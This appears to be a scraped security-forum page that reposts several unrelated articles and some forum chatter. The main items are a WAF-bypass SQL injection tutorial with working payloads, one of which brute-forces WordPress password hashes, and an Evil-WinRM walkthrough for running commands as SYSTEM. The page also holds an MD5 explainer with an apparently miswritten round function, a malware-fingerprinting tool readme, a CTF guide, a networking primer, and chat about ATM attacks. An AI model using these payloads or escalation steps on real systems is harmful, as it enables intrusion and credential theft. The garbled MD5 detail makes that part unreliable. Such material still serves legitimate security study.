Advanced boolean-based SQLi filter bypass techniques Learn how to bypass filters and Application Firewall rules using MySQL String Functions, Regex Functions, Conditional Select and Set Variables to exploit a blind (boolean-based) SQL Injection vulnerability. This article aims to show you some techniques to exploit a SQL Injection vulnerability bypassing libinjection (running inside a Web Application Firewall). libinjection is an open-source SQL / SQLi tokenizer parser analyzer created by Nick Galbreath from Signal Sciences that aims to detect SQL Injection and XSS payloads. Libinjection runs in many Web Application Firewall because it performs better than a regular expression based ruleset. Despite this, it works well and it detects many SQLi payloads, and it can be bypassed by using specific SQL syntaxes such as MySQL string functions or conditional select. Let's take a look at the following request that tries to check if the parameter id can be injectable with SQL syntax: /index.php?id=1+AND+1=1 It is successfully identified by libInjection as SQLi attempts. You can use a list of Arithmetic Operators, String Functions and Conditional Select syntaxes to bypass it. Arithmetic operators Consider you need to check a parameter with a numeric value 2 in order to see if it's vulnerable to SQL Injection. You can make it by replacing the number 2 with an arithmetic operation. For example: OPERATOR DESCRIPTION EXAMPLE INJECTION + Addition select 1 + 1 /index.php?id=1%2b1 - Subtraction select 3 - 1 /index.php?id=3-1 * Multiplication select 2 * 1 /index.php?id=2*1 / Division select 2 / 1 /index.php?id=2/1 DIV Integer Division select 2 DIV 1 /index.php?id=2+DIV+1 String Functions libinjection intercept most of SQLi classic attempts like 1+OR+1=1 but, speaking of MySQL, it's possible to bypass its filters by using MySQL functions: INSERT: Insert substring at specified position up to n characters /index.php?id=1+OR+1=insert(1,1,1,1)-- REPEAT: Repeat a string the specified number of times index.php?id=1+OR+1=repeat(1,1)-- REPLACE: Replace occurrences of a specified string /index.php?id=1+OR+1=replace(1,1,1)-- RIGHT: Return the specified rightmost number of characters /index.php?id=1+OR+1=right(1,1)-- WEIGHT_STRING: Return the weight string for a string /index.php?id=1+OR+weight_string("foo")=weight_string("foo")-- IF statement: Implements a basic conditional construct /index.php?id=IF(1,1,1)-- Expression and Comments to Bypass As you might know, a useful technique that could help in bypassing filters is to insert comments inside the SQL syntax, such as sEleCt/*foo*/1. This kind of payload is well blocked by WAF that uses libinjection but the following syntax seems to bypass it well: {`<string>`/*comment*/(<sql syntax>)} For example, in a real scenario: curl -v 'http://wordpress/news.php?id=\{`foo`/*bar*/(select+1)\}' Following some other examples: EXAMPLE INJECTION select login from users where id={`foo`/*bar*/(select 2)}; /index.php?id={`foo`/*bar*/(select+2)} select login from users where id={`foo`/*bar*/(select--2)}; /index.php?id={`foo`/*bar*/(select--2)} select login from users where id={`foo`/*bar*/(select+2)}; /index.php?id={`foo`/*bar*/(select%2b2)} In a real scenario, if you found a boolean-based SQL Injection for example on a vulnerable WordPress plugin, and you need to bypass a WAF using libinjection to exploit it, you can bruteforce and exfiltrate the password hash of a user by using the following payload: /index.php?id={`foo`/*bar*/(select+1+from+wp_users+where+user_pass+rlike+"(^)[$].*"+limit+1)} In this case, the RLIKE operator makes me able to brute-force the hashed password value by checking the response body length after adding characters to the regular expression. For example (using any web fuzz tool): RLIKE "(^)[$].*" -> return ok (hash: $) RLIKE "(^)[$][a].*" -> error or different response body length RLIKE "(^)[$][b].*" -> error or different response body length RLIKE "(^)[$][c].*" -> return ok (hash: $c) RLIKE "(^)[$][c][a].*" -> error or different response body length RLIKE "(^)[$][c][b].*" -> error or different response body length RLIKE "(^)[$][c][c].*" -> return ok (hash: $cc) etc... Assignment Operators The := assignment operator causes the user variable on the left hand side of the operator to take on the value to its right. The value on the right hand side may be a literal value, another variable storing a value, or any legal expression that yields a scalar value, including the result of a query (provided that this value is a scalar value). You can perform multiple assignments in the same SET statement. You can perform multiple assignments in the same statement. Unlike =, the := operator is never interpreted as a comparison operator. This means you can use := in any valid SQL statement (not just in SET statements) to assign a value to a variable. We can use all syntaxes shown before (Expression, Comments, RLIKE, and Assignment Operator) too (thanks to @seedis https://github.com/seedis). For example: /index.php?id=@foo:=({`if`/*bar*/(select+1+from+wp_users+where+user_pass+rlike+"^[$]"+limit+1)})+union+%23%0a+distinctrow%0b+select+@foo This requires more explaining: select id=1 by injecting SQL query select id=2 by injecting SQL query References https://dev.mysql.com/doc/refman/8.0/en/arithmetic-functions.html https://dev.mysql.com/doc/refman/5.7/en/expressions.html https://dev.mysql.com/doc/refman/8.0/en/assignment-operators.html https://github.com/coreruleset/coreruleset/issues/1167 If you liked this post, follow me! Follow @Menin_theMiddle Follow @theMiddleBlue235 The awesome image used in this post is called "Lights Out" by spovv. theMiddle OWASP Core Rule Set Developer, Co-Founder at Rev3rse Security, I ❤️ to break application firewalls. Sursa: https://www.secjuice.com/advanced-sqli-waf-bypass/

Breaking Down: MD5 Algorithm 824 SHARES ShareTweet Breaking Down: MD5 Algorithm by Aditya Anand The previous article that I wrote was on Breaking Down : SHA-1 Algorithm. I have explained the use and purpose of hashing over there, do have a look at it. After writing that I planned why not to write a whole series of article explaining different hashing algorithms and maybe after that even some cryptographic algorithms and their functioning. One of the major problem in the cybersecurity community is that as we get deep into security and we gradually lose touch with how these algorithms actually work and end up only downloading and using these libraries without giving a second thought about its functionality. This article is an attempt for me to explain the functionality of this hashing algorithms to those who are starting out or those who want to review the basics once again. Hashes are one of the most frequently used terms used in the cyber security domain and are extremely useful for various tasks like checksum, file integration verification, password verification etc. Here is a bird’s eye-view of the entire hashing algorithm of how. Let’s begin! MD5 hashing technique is where SHA 1 technique has arrived from hence these two are extremely similar. There are some more details I have mentioned over there that will make it easier for you to understand this entire functioning, so you can read that as well - Breaking Down : SHA-1 Algorithm Ok, now that you have read it let’s go through this whole thing and understand the functioning of MD5 hashing. 1. Append padding bits Let’s add few amount of bits to the message so that it becomes equivalent to 64 bits less than a multiple of 512. The addition of padding bits works in the form that we append 1 to the end of the message and then the rest of the bits that needs to be added are 0. 2. Append length bits This is the step in which we add the remaining 64 bits to the message so that the length of the message becomes an exact multiple of 512. The bits that we add here depends on the length of message ( original one without the padding ) if the length of that message is 8 then we add 1 in the first eight bits and for the next fifty six bits we add 0, if the length was 64 then all the 64 bits are 1 and if the length is greater than 64 then we calculate the modulus and append that many 1’s and the rest of the 64 bits will be 0’s 3. Initialise MD buffer This is one of the most important steps of all where we have four different buffers ( A, B, C & D ) and each one of them is 32 bits long. Their initial default values (little-endian): A = 0x67452301 B = 0xefcdab89 C = 0x98badcfe D = 0x10325476 4. Process each 512 bit block Now, let’s go back to our initial discussion where we saw that we perform a total of 64 operations that we perform on each of the 512 bit chunk. These operations that we perform is divided into 4 rounds and 16 operations in each of those rounds. The image below gives us an pictorial representation of the entire compression function i.e. the entire 64 operations. The peculiarity of each of these rounds is that in every round there are unique functions depicted below F(B,C,D) = (B AND D) OR ((NOT B) AND D) G(B,C,D) = (B AND D) OR (C AND (NOT D)) H(B,C,D) = B XOR C XOR D I(B,C,D) = C XOR (B OR (NOT D)) For the first round, which consists of 16 operations we will use the F(B,C,D), then we will use G(B,C,D), then H(B,C,D) and for the last round I(B,C,D). The 512 bit message chunk id is further divided into 16 parts, each of them is of 32 bits, we refer to them as M(1), M(2) and so on. We have a fixed value K(i) which is unique for each operation i.e. there are 64 K(i), mentioned below ( little-endian ). K[ 0.. 3] := { 0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee } K[ 4.. 7] := { 0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501 } K[ 8..11] := { 0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be } K[12..15] := { 0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821 } K[16..19] := { 0xf61e2562, 0xc040b340, 0x265e5a51, 0xe9b6c7aa } K[20..23] := { 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8 } K[24..27] := { 0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed } K[28..31] := { 0xa9e3e905, 0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a } K[32..35] := { 0xfffa3942, 0x8771f681, 0x6d9d6122, 0xfde5380c } K[36..39] := { 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60, 0xbebfbc70 } K[40..43] := { 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05 } K[44..47] := { 0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665 } K[48..51] := { 0xf4292244, 0x432aff97, 0xab9423a7, 0xfc93a039 } K[52..55] := { 0x655b59c3, 0x8f0ccc92, 0xffeff47d, 0x85845dd1 } K[56..59] := { 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314, 0x4e0811a1 } K[60..63] := { 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391 } We also carry out left bit rotation in each of the operations and their is an amount set for every operation of every function. The bits we need to rotate left by is depicted by ‘s’. The values of s for each operation are mentioned below. s[ 0..15] := { 7,12,17,22,7,12,17,22,7,12,17,22,7,12,17,22 } s[16..31] := { 5,9,14,20,5,9,14,20,5,9,14,20,5,9,14,20 } s[32..47] := { 4,11,16,23,4,11,16,23,4,11,16,23, 4,11,16,23 } s[48..63] := { 6,10,15,21,6,10,15,21,6,10,15,21,6,10,15,21 } Now, that we have the values that are required to carry out each operations we can focus on each and every round and hwo they function. 5. Output message digest The image here shows how every operation takes place. Inside every operation there are again a set of functions that are performed which provides us with the output which in turn acts as inputs for the next operation. We carry out these operations over and over again till we reach the last chunk of the 512 bit message and so the output that we obtain after processing the last chunk is the actual MD5 hash which id of 128 bits, as each A, B, C & D is of 32 bits each and combined together they form the total 128 bits. Conclusion The MD5 hashing algorithm has already been broken down and it basically should not be used at any place like banking and e-commerce websites. The have a look at the entire working of the MD5 hashing let’s go through it once again. The message that needs to be hashed is first broken down into 448 bits of pieces and for the last piece we carry out padding. An extra 64 bits is appended to it taking the total number of bits to be 512 bits, this acts as a message block going ahead. This message block of 512 bits is broken down in 16 parts of 32 bits each. which then acts as input for the operation that we carry out in the next step. Now let’s get into the main part of the hashing algorithm, there are a total of 64 operations that are performed on the 512 bits message block. These operations are initiated with a default value that I mentioned above ( A, B, C & D). There is a set of functions that are performed in each of these operations and the functions are already defined and the values which it is going to use. The 64 operations that we perform are also divided into 4 different rounds Each round has distinct set of functions, The 32 bit part of the message that we have broken down acts as an input ( depicted in above image ) and there is predefined values of K(i) as well, already mentioned above, the next step is to perform rotate left function, the number of bits the program rotates left is already defined as well. When an entire operation is done it passes on its values to the next operation. After 64 such operation is performed on the first 512 bit message block the output is then passed on for the next operation to be carried out on the next 512 bits till the last message block is reached. The output we receive from the operations being performed on the last message block is the hash of the original message of 128 bits. So that’s the short version of the whole functioning of the MD5 algorithm. Depiction of every operation About the Author CyberSec professional, crazy about tinkering with computers. I am a bug hunter and specialise in helping companies and organisations, by finding bugs in their web / mobile applications and help them solve it. Freelancing in the field of networking and cybersecurity. Spend my days working on Kali. Well-versed programmer in C, C++, Bash Script and JAVA language. Website : aditya12anand.com | Donate : paypal.me/aditya12anand Telegram : https://t.me/aditya12anand Twitter : twitter.com/aditya12anand LinkedIn : linkedin.com/in/aditya12anand/ E-mail : aditya12anand@protonmail.com The article has been originally published at: https://medium.com/bugbountywriteup/breaking-down-md5-algorithm-92803c485d25 Sursa; https://pentestmag.com/breaking-down-md5-algorithm/

Mercedes-Benz C-Class W203 Instrument Cluster Hacked to Display Custom Text 12 Sep 2020, 11:19 UTC · by Bogdan Popa Home > News > Technology There are many ways to upgrade the infotainment capabilities of an old car, and while most people turn to head unit upgrades to get new-gen systems like Apple CarPlay and Android Auto, these bring absolutely no change to the information that you get on the instrument cluster. 34 photos Needless to say, carmakers themselves don’t provide too many customization options for the displays incorporated in the instrument panel, pretty much because the focus here should be on the speedometer and the other data related to the vehicle health status. The digital dash push has more or less changed this in the last few years, but as far as an older car is concerned, the options that are available for their owners are incredibly limited. A reverse engineer, however, has found a way to break into the instrument cluster system available on the 2006 Mercedes-Benz C-Class W203, eventually being able to display custom text and messages, as well as music playback controls. This isn’t something that everyone can do, there’s no doubt about it, but the developer has also published the full documentation on GitHub, so anyone with the right skills and an older C-Class W203 can technically do the same thing if they follow the provided instructions. The hack is powered by an Android tablet connected to the Can bus in the car, something that also allowed the developer to customize additional features of the C-Class, including the lighting system. At the end of the day, a lot of work has been put into this project, so it goes without saying it’s not something that any Average Joe can just run to get access to their car’s instrument cluster backend settings without knowing anything about coding or how the installed controllers work. And while for some it might seem easier to just replace the screen in the car, this isn’t actually possible in the W203, and the developer himself explains that designing a new instrument panel is pretty much the only alternative to this reverse engineering project. MERCEDES-BENZ W203 REVERSE ENGINEERING CAR HACKING MERCEDES-BENZ C-CLASS C-CLASS Sursa: https://www.autoevolution.com/news/mercedes-benz-c-class-w203-instrument-cluster-hacked-to-display-custom-text-148623.html

Hfinger - fingerprinting HTTP requests Tool for fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage It's main objective is to provide a representation of malware requests in a shorter form than printing whole request, but still human interpretable. This representation should be unique between malware families, what means that any fingerprint should be seen only for one particular family. An academic paper accompanies work on this tool, describing, for example, motivation of design choices. It will be published here after peer-review process. The idea Basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about structure and values of some headers to provide means for further analysis. For example grouping of similar requests - at this moment it is still work in progress. After analysis of malware's HTTP requests and headers, some parts of requests were identified as being most distinctive. These include: Request method Protocol version Header order Popular headers' values Payload length, entropy and presence of non-ASCII characters Additionally, some standard features of request URL were also considered. All these parts were translated into set of features, described in details here. The above features are translated into varying length representation, which is the actual fingerprint. Depending on report mode, different features are used to fingerprint requests. More information on these modes is presented below. Feature selection process will be described in the upcoming academic paper. Installation At this moment hfinger is distributed only via this repository. Tshark required before installation - tested on Xubuntu 20.04 LTS with tshark package in version 3.2.3. Please note, that as with any PoC, you should run it in a python virtual environment. Its setup is not covered here, but you can try this tutorial. Hfinger installation: Download repository. Unpack it to a chosen location. In terminal, change directory to the main catalogue of the unpacked repo. Enable venv Run python3 setup.py install Hfinger should be installed and ready to use. Usage Calling the tool from a command line: usage: hfinger.py [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2}] Hfinger - fingerprinting HTTP requests stored in pcap files optional arguments: -h, --help show this help message and exit -f FILE, --file FILE Read single pcap file -d DIR, --directory DIR Read pcap files from directory DIR -o output_path, --output-path output_path Path to the output directory -m {0,1,2}, --mode {0,1,2} Fingerprint report mode. 0 - optimal (default), 1 - informative, 2 - all features You must provide path to a pcap file (-f) or directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to provided directory (-o) using name of the source file. For example output of the command: python3 hfinger.py -f example.pcap -o /tmp/pcap will be saved to: /tmp/pcap/example.pcap.json When any issues are encountered, for example finding unknown header, they are printed to standard error output, so please monitor it. Fingerprint creation An example of a POST request is presented below. POST /dir1/dir2?var1=val1 HTTP/1.1 Host: 127.0.0.1:8000 Accept: */* User-Agent: My UA Content-Length: 9 Content-Type: application/x-www-form-urlencoded misc=test The fingerprint created by hfinger in the default report mode for this request is presented below. Particular features of the fingerprint are separated using |. They are described below in the order of appearance in the fingerprint. Firstly URL features are extracted: URL length represented as a logarithm base 10 of the length, extension of the requested file, but only if it is on a list of known extensions in hfinger/configs/extensions.txt (in the example it is empty as the request does not contain it), number of variables in the URL (in the example there as only one variable var1). Secondly header structure features are analyzed: request method encoded as first two letters of the method (PO), protocol version encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9), and popular headers and their values, When analyzing popular headers, the request is checked if they appear in it. These headers are: Connection Accept-Encoding Content-Encoding Cache-Control TE Accept-Charset Content-Type Accept Accept-Language User-Agent When header is found in the request, its value is checked against table of typical values to create pairs of header_name_representation:value_representation. The name of the header is encoded according to hfinger/configs/headerslow.json and value is encoded according to tables stored in hfinger/configs directory. In the above example Accept is encoded as ac and its value */* as as-as (asterisk-asterisk), giving ac:as-as. The pairs are inserted into fingerprint in order of appearance in the request and are delimited using /. If the header value cannot be found in in the encoding table it is hashed using FNV1a hash. Also if it is composed of multiple values, they are tokenized to provide list of values delimited with ,, for example Accept: */*, text/* would give ac:as-as,te-as. However, at this point of development, if the header value contain "quality value" tag (q=), then the whole value is hashed with FNV. Finally values of User-Agent and Accept-Language headers are directly hashed using FNV. Some of the hfinger report modes provide a list of headers in order of appearance in the request. The list is created using similar method as described above. The header names are encoded using hfinger/configs/headerslow.json and separated with ,. If the header name does not start with upper case letter (or any of its parts when analyzing compound headers such as Accept-Encoding), then encoded representation is prefixed with !. If the header name is not on the list of known headers it is hashed using FNV. Finally, in the payload features, length of the payload is represented as a base 10 logarithm of the actual payload length rounded to an integer. Please note that the above description of fingerprint creation covers the default feature set. Hfinger is equipped with other feature sets, which can be chosen depending on the required amount of information. They are available via report modes switch. Report modes Hfinger operates in three fingerprint report modes, which differ in information extracted from requests: optimal, informative, all features. The modes were chosen in order to optimize hfinger capabilities to uniquely identify malware families versus its capability to generalize information about the requests. Description of features is provided here. The all features mode provide the most unique fingerprints, however it produces bigger number of fingerprints than other two modes. The optimal mode provides slightly less unique fingerprints, but also significantly reduces the number of fingerprints. The informative mode is similar to optimal regarding uniqueness, however it produces more fingerprints for the price of giving more information about URL, headers and payload. The modes consists of feature sets: optimal (the default - option 0😞 URL length represented as a base 10 logarithm of the actual length, extension of the requested file, number of variables in the URL, request method, protocol version, popular headers and their values, payload length represented a base 10 logarithm of the actual length rounded to integer, informative (option 1😞 URL length represented as a base 10 logarithm of the actual length, number of directories in the URL, extension of the requested file, number of variables in the URL, request method, protocol version, order of headers, popular headers and their values, payload length represented a base 10 logarithm of the actual length rounded to integer, and payload entropy represented as an integer, all features (option 2😞 URL length represented as a base 10 logarithm of the actual length, number of directories in the URL, average length of directory in the URL, represented as a base 10 logarithm of actual average length, extension of the requested file, length of the variable part of the URL, represented as a base 10 logarithm of the length and rounded to an integer, number of variables in the URL, average value length, represented as base 10 logarithm of the actual average value length rounded to an integer, request method, protocol version, order of headers, popular headers and their values, presence of non-ASCII characters (with "N" when such characters are present and "A" when they are not), payload length represented a base 10 logarithm of the actual length, payload entropy. Sursa; https://github.com/CERT-Polska/hfinger

Run as SYSTEM using Evil-WinRM This is a quick blog post on how to elevate to SYSTEM without the need for PSEXEC when you are using PowerShell, or more specifcially in this case, PowerShell Remoting (WinRM). First off, let me introduce my tool of choice here. It’s Evil-WinRM. I spoke about it in the Practical Exploitation video here: https://www.youtube.com/watch?v=tVgJ-9FJKxE, so I won’t go too far indepth. It’s essentially the only WinRM tool that I’ve found to work well in a non-Windows native situation (also you can proxy it through proxychains which is AWESOME!!). Anyways. I want to document how to run commands as SYSTEM without the use of PSEXEC. I found this technique on a 4sysops blog post called Running PowerShell Remotely As System with Invoke-CommandAs. Side-note you should definitely bookmark thier blog it’s great. Invoke-CommandAs is not a native function of PowerShell, so you need to download it from the original author’s Github repo: https://github.com/mkellerman/Invoke-CommandAs For our uses all you need to do is get these two particular files: https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Public/Invoke-CommandAs.ps1 https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps1 Here you can see me putting those two files into a scripts directory I made inside of the Evil-WinRM folder. (git clone https://github.com/Hackplayers/evil-winrm + bundle install) root@attacker:~/evil-winrm/scripts# ls Invoke-CommandAs.ps1 root@attacker:~/evil-winrm/scripts# wget https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke- --2020-09-13 20:17:56-- https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.200.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.200.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 10009 (9.8K) [text/plain] Saving to: 'Invoke-ScheduledTask.ps1' Invoke-ScheduledTask.ps1 100%[=========================================================================================== 2020-09-13 20:17:56 (5.37 MB/s) - 'Invoke-ScheduledTask.ps1' saved [10009/10009] Once that’s ready, I run Evil-WinRM with the -s flag and specify the scripts directory I put the two files in. root@attacker:~/evil-winrm# ruby evil-winrm.rb -i 192.168.80.10 -u uberuser -s scripts/ Enter Password: Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\uberuser\Documents> Once I have the shell I load each of the scripts by typing out their file names (tab complete should work) *Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-ScheduledTask.ps1 *Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs.ps1 Once they are loaded you need to run the menu command to load the functions into memory on the attackers side. I haven’t looked at the code enough to know exactly why this is needed, but it doesn’t seem to work if you don’t. *Evil-WinRM* PS C:\Users\uberuser\Documents> menu ,. ( . ) " ,. ( . ) . (" ( ) )' ,' (` '` (" ) )' ,' . ,) .; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( _".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _') \_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \ | __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \ | \\ /| | |__ /_____/ \ /| | | \ | \/ Y \ /_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ / \/ \/ \/ \/ \/ By: CyberVaca, OscarAkaElvis, Laox @Hackplayers [+] Bypass-4MSI [+] Dll-Loader [+] Donut-Loader [+] Invoke-Binary [+] Invoke-CommandAs [+] Invoke-ScheduledTask As we can see both of the needed functions are loaded and we can finally issue our commands as SYSTEM with the -AsSystem flag and the command being whoami: *Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs -ScriptBlock {whoami} -AsSystem nt authority\system *Evil-WinRM* PS C:\Users\uberuser\Documents> Sursa; https://malicious.link/post/2020/run-as-system-using-evil-winrm/

Beginner’s Guide To CTFs How To Start With Security Capture The Flag Competitions. Security CTFs, or Capture The Flag competitions, are a great way to learn how to hack. They are competitions where competitors compete to try to find a “flag” to prove that they have hacked into a system. Why do CTFs?Permalink They are one of the best ways to learn specific security skills, like binary exploitation, web exploitation or reverse engineering. And since you often play CTFs in teams, CTFs are also a great way to make friends with likeminded security nerds. There are many collegiate-level CTFs where you can compete with fellow students, and you’ll find that many practicing security professionals play CTFs as well. Finally, CTFs train your hacker persistence. The CTF experience of getting stuck in a challenge, persist and finally finding a solution models real-life hacking scenarios. CTFs teach you to remain patient and optimistic when you are stuck hacking. Types of CTFsPermalink There are two main types of CTFs: Jeopardy-style and Attack-Defense-style. Jeopardy-style CTFs are essentially a list of hacking challenges that you can complete for flags that are worth a certain number of points. These challenges involve exploiting a vulnerability or solving a programming challenge to steal a “flag”. Teams compete to see who can find the most flags and gain the most points under a time limit. The hacking challenges in Jeopardy-style CTFs are often sorted by difficulty levels, so beginners can easily participate as well. There are often different skillsets that you can choose from, from cryptography, reversing, binary, web, programming, forensics, networking challenges to problems that are a mix of some or all of these skills. A more advanced version of CTFs is the Attack-and-Defense-style CTF. In these competitions, teams defend their own servers against attack, and attack opponents’ servers to score. These CTFs require more skills to compete and are almost always done in teams. For example, the annual DEFCON CTF finals is an Attack-and-Defense-style CTF. CTF skillsPermalink There are two very important things that you’d have to learn to do in order to start participating in the CTF world: finding teams and learning to gain new skills. How to find teamsPermalink First, how do you find teams to enter CTF competitions? If you are a high school or college student, see if your school has a cybersecurity club. These clubs often have already established CTF teams that you can join and compete with. On the other hand, if your school does not already have a club, try starting one and gather likeminded people! Before you know it, you’d have a group of teammates who are passionate about hacking as well. If you don’t belong to a school, social media is a great way to find teammates. Twitter is one of the best ways to reach out to people you want to collaborate with. Hacking forums and infosec discord channels are also good for this. How to gain the required technical skillsPermalink For beginner Jeopardy challenges, specific technical skills are often not required. After all, that is what you are trying to learn! However, it is good to have a basic understanding of how to use the command line and to have basic programming knowledge. More advanced technical skills can be gained by completing easier challenges or by googling. It is also helpful to keep in touch with the latest security news, as CTF challenges are often based on recently found vulnerabilities. List Of CTFs To Play NowPermalink Most CTF challenges run within a specific timeframe and are only available to registered teams. However, there are a large number of “always-online” Jeopardy-style CTFs that you can start playing right away. For a lot of these CTFs, you don’t need a team and can play without a time limit! Web exploitation CTFsPermalink Pentesterlab is a pretty good resource to start learning web penetration testing. In their challenges, you can read about the details of a vulnerability first before you exploit them hands-on. There are a wide variety of challenges available, from basic XSS to recently discovered web vulnerabilities. The Hacker101 CTF is another good resource. It has a large list of simple challenges that are aimed at building web hacking skills, with a focus on vulnerabilities that are most likely to show up in bug bounty programs. Reverse engineering CTFsPermalink If reverse engineering is more your vibe, you can check out this site. Crackme hosts many broken programs that you can try to hack. You can find broken programs on a variety of platforms: Windows, Unix, and multi-platforms. As a fun challenge, you can even write your own vulnerable program and share it with others! Mixed CTFsPermalink OverTheWire is the site that I recommend most beginners to start with. It is where I started playing CTF challenges. It starts with teaching the basics of using the command-line and programming. Then you are given a wide range of challenges to choose from: from web security, binary exploitation to reverse engineering. Hack This Site! is also a pretty good one. It is a little like OverTheWire in that is has a variety of challenges, ranging from super easy to advanced. It is also one of the few places where you can find forensics and steganography challenges if that’s what you are into. Live CTFsPermalink Finally, if you want to participate in a live CTF or an Attack-and Defense style CTF, check out CTFtime.org for a list of current and upcoming CTF events. CTF Etiquette!Permalink Before you go on to playing CTFs (and having the time of your life!), here are a few sacred rules of CTF participation that you should keep in mind. First, absolutely do not post solutions and flags online! The purpose of CTFs is to help people become better hackers through the mental struggle of solving challenges. Giving solutions away is denying the chance for others to learn. On the other hand, you also should not try to google solutions or ask for flags online. You can ask for help, discuss with others or even collaborate in solving a challenge, but asking or googling for solutions takes away from the experience. Even if you try to understand the solution, it is not the same as working hard to and finally finding the answer yourself! Have Fun!Permalink CTFs are a great hobby that ultimately makes you a better hacker. In fact, many of the most skilled hackers came from CTF backgrounds. I hope you’ll find the experience rewarding as well. Best of luck and have fun! Categories: Hacking Updated: September 10, 2020 Sursa: https://vkili.github.io/blog/hacking/intro-ctf/

Unde sa ne inregistram? Pe acel opensc? Dread? Nu am idee care sunt.

Pentru cei interesati sa prezinte, asteptam CFP: https://rstcon.com/cfp/

Da, in general cei care isi risca libertatea astfel probabil isi vor lua cat mai multe masuri, atat sa se asigure ca atacul le iese, cat si ca nu sunt prinsi. Ca tot veni vorba, acum X ani am discutat cu cineva de la o banca care se ocupa de partea cu securitatea ATM-urilor, fizica. Si mi-a zis o chestie foarte interesanta legata de skimmere (acele device-uri care iti copiaza datele de pe card, de banda magnetica). Eu cand merg la un ATM trag ca taranul de partea in care se introduce cardul si de tastatura. Iar el a zis asa: "Daca gasesti vreodata un skimmer, il pui la loc si pleci. Apoi daca vrei poti anunta politia. Acel skimmer ii costa pe ei o gramada de bani, pana la 10.000 de $ si pentru el ar fi in stare sa te taie in miezul zilei. Cu siguranta e cineva prin zona, nu pleaca si isi lasa device-ul nesupravegheat". Ceea ce fac altii prin afara si se filmeaza cum descopera ei astfel de lucruri poate fi periculos.

Nu cred ca "informatiile necesare" sunt o problema. Din cate stiam eu, puteai sa iti cumperi singur un ATM, cred ca era vreo 5000 de $, de pe ebay, aliexpress sau mai stiu eu ce. La calcule e important zidul in care sunt prinse pentru a-si da seama cat explozibil sa foloseasca si e bine ca nu folosesc prea mult... De fapt nici nu cred ca e nevoie, altii prin SUA le trageau direct cu masinile alea mari ale lor (motor de 5L, cred ca trage). Eu sunt curios cum sparg apoi seiful. Cu siguranta se poate, probabil si cu un polidisc (si multe discuri schimbate).

RST Con va avea loc pe data de 20 noiembrie 2020 (vineri). Asteptam sugestii si in legatura cu "site-ul oficial": https://rstcon.com/ De asemenea asteptam aplicarile pentru prezentari.

Da, e vorba de o inflamatie la coloana vertebrala. Scria pe undeva ca "se mai intampla" la testarea vaccinurilor. Cipul are prea multi tranzistori si undele sale bio-electro-magnetice interfereaza cu undele encefalo-neurlogice transmise de catre coloana vertebrala in corp (acele mesaje de Keep-Alive intre coloana si organe pentru a determina downtime-ul unora). Un fel de Human Jammer acest cip... Mama, as fi bun de facut o mizerie dinaceea de site conspirationist, as face avere.

UDP vs. TCP: A Quick Comparison Sep 7 2020 Some background you may or may not care about# I took a networking class in college. It wasn’t a great experience, as the professor was at the school really just to pursue research, leaving us peasant students to 5-question long exams, each 25% of our grade and with .05% of the content from 200+ long slide decks. Needless to say, it wasn’t a very useful class. So here I am, some number of years into my cybersecurity career, able to recognize and speak about different network protcols at fluctuating levels depending on the day. It’s time to change that. I want to understand, like really understand what’s going on. This blog post is going to cover some of the most fundamental concepts in the networking world: UDP and TCP, two transport-level protocols. UDP (User Datagram Protocol)# UDP is a connectionless, message-oriented protocol. It functions through the sending and receiving of packets without having to establish a connection between a client and server. As a result, once a message has been sent, there is no further communication with the message receiver. Additionally, the packets are not numbered. This means that packets are not guaranteed to arrive in order, or even to arrive at all. UDP does not wait for acklowedgement of message receipt, it simply yeets the message and moves on. Due to its connectionless nature, UDP is good for real-time information delivery. As messages are told to be transmitted, they are transmitted. Packets may be dropped due to lack of congestion control. Because the sender isn’t waiting for an ack, nor is the receiver going to send an ack, dropped packets will go unnoticed by both the client and server. This is okay in certain real-time examples, such as streaming. A momentary glitch will not deter a viewer. This also means that UDP is able to support broadcasting. Error checking in UDP occurs through a 16-bit checksum. The checksum is used as follows: the sender computes the checksum corresponding to the data being sent and stores it in the header; upon receipt, the receiver computes the checksum using the received data and compares it to the checksum in the header. It’s important to note that the checksum is mandatory in IPv6 but not IPv4. The UDP segment, or the data portion, of an IP packet includes an 8-byte header followed by variable length data. The header is composed as follows: The first 4 bytes of the header store the port numbers of the source and destination. The next 2 bytes of the header store the length of the UDP segment. The last 2 bytes of the header store the checksum. TCP/IP (Transmission Control Protocol)# TCP is a handshake-based, connection-oriented protocol. TCP 